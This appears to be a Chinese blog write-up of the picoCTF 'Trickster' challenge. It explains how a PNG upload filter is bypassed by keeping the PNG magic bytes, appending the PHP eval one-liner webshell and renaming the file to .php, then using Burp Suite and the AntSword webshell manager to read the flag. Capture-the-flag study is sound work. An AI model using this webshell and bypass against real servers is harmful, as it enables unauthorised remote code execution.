当前位置: 首页 > news >正文

picoCTF-Web Exploitation-Trickster

news 2025/8/3 1:09:44

Description

I found a web app that can help process images: PNG images only!

这应该是个上传漏洞了,十几年没用过了,不知道思路是不是一样的,以前的思路是通过上传漏洞想办法上传一个木马,拿到webshell,今天试试看能不能成功。
随便翻一翻源码没有找到什么有用的信息,只找到一个robots.txt(这还是最近才学到的给Google提供的map文件)
robots.txt发现如下信息

User-agent: *
Disallow: /instructions.txt
Disallow: /uploads/

有一个/uploads/文件夹这里应该就是文件上传后的地址了

/instructions.txt文件信息如下,大意是提交时验证.png 扩展名,然后还要验证文件字节的正确性

Let's create a web app for PNG Images processing.
It needs to:
Allow users to upload PNG images
look for ".png" extension in the submitted files
make sure the magic bytes match (not sure what this is exactly but wikipedia says that the first few bytes contain 'PNG' in hexadecimal: "50 4E 47" )
after validation, store the uploaded files so that the admin can retrieve them later and do the necessary processing.

那我i们就试一试,上传一个非png文件提示需要.png后缀,把非png文件后缀改为.png发现后端也有有文件头验证,可能这就是/instructions.txt 所说

随便制作一个png图片(直接截图保存),越小越好,便于我们查看修改文件信息,上传png图片
使用Burpsuite抓包,查看请求信息Content-Type: image/png 这应该就是后端的验证关键了吧
修改png文件信息,加上PHP一句话木马,修改一下filename后缀加上.php,(这里后缀的验证是前端js做的,用Burpsuite发送请求就不必考虑后缀的验证问题了)
如图返回上传成功

<?php @eval($_POST['hucker']);?>

在这里插入图片描述
接下来我们使用中国蚁剑连接木马地址,以前用菜刀,管理webshell,爬取网站文件信息挺好用的,百度找到一个中国蚁剑就决定试试,看介绍好像也是根据菜刀改的。这种黑客软件最好是去github下载原版,可以验证MD5,毕竟是开源的东西,一般不会存在后门。

连接我们的木马,前面我们通过robots.txt看到文件上传目录是uploads,组合一下得到地址[http://atlas.picoctf.net:49226/uploads/2.png.php],输入密码hucker 连接

直接查看网站文件,找到一个GAZWIMLEGU2DQ.txt 里面就是flag了
在这里插入图片描述
在这里插入图片描述

http://www.lryc.cn/news/348455.html

相关文章:

  • SSH 免密登录,设置好仍然需要密码登录解决方法
  • 【斑马打印机】web前端页面通过BrowserPrint API连接斑马打印机进行RFID条形码贴纸打印
  • DigitalOcean 应用托管更新:应用端到端运行时性能大幅改进
  • c/c++对于char*的理解(联合string容器)
  • Web前端三大主流框架是什么?
  • 一个基于servlet的MVC项目-登录验证
  • Windows 11 下 kafka 的安装踩坑
  • 二维数组:行列互换/求最大值及其所在位置/求各行各列的和/矩阵乘积/深入理解二维数组
  • The Onion Router-洋葱
  • 自动化工具 Ansible:playbooks 剧本编写
  • AttributeError: module ‘flask.app‘ has no attribute ‘route‘
  • 在云计算与人工智能中,7ECloud扮演着什么样的角色
  • 视频推拉流EasyDSS视频直播点播平台如何优先展示正在直播的直播间?
  • JavaEE之线程(4)——线程安全、线程安全的原因,synchronized关键字
  • Python3 笔记:分支结构
  • 《TAM》论文笔记(上)
  • 【Java的抽象类和接口】
  • 今天开发了一款软件,我竟然只用敲了一个字母(文末揭晓)
  • 【C++杂货铺】红黑树
  • css--控制滚动条的显示位置
  • 华为设备display查看命令
  • 自动攻丝机进出料激光检测 进料出料失败报警循环手动及关闭报警退出无限循环
  • 2024年去除视频水印的5种方法
  • 怎么用电脑接收手机文件 用备忘录传输更舒服
  • 微信小程序、uniapp密码小眼睛
  • 【手势操作-复习前一天的内容-预习今天的内容 Objective-C语言】
  • ​​​【收录 Hello 算法】第 6 章 哈希表
  • rust类型和变量(二)
  • linux学习:多媒体开发库SDL+视频、音频、事件子系统+处理yuv视频源
  • 基于门控的循环神经网络:LSTM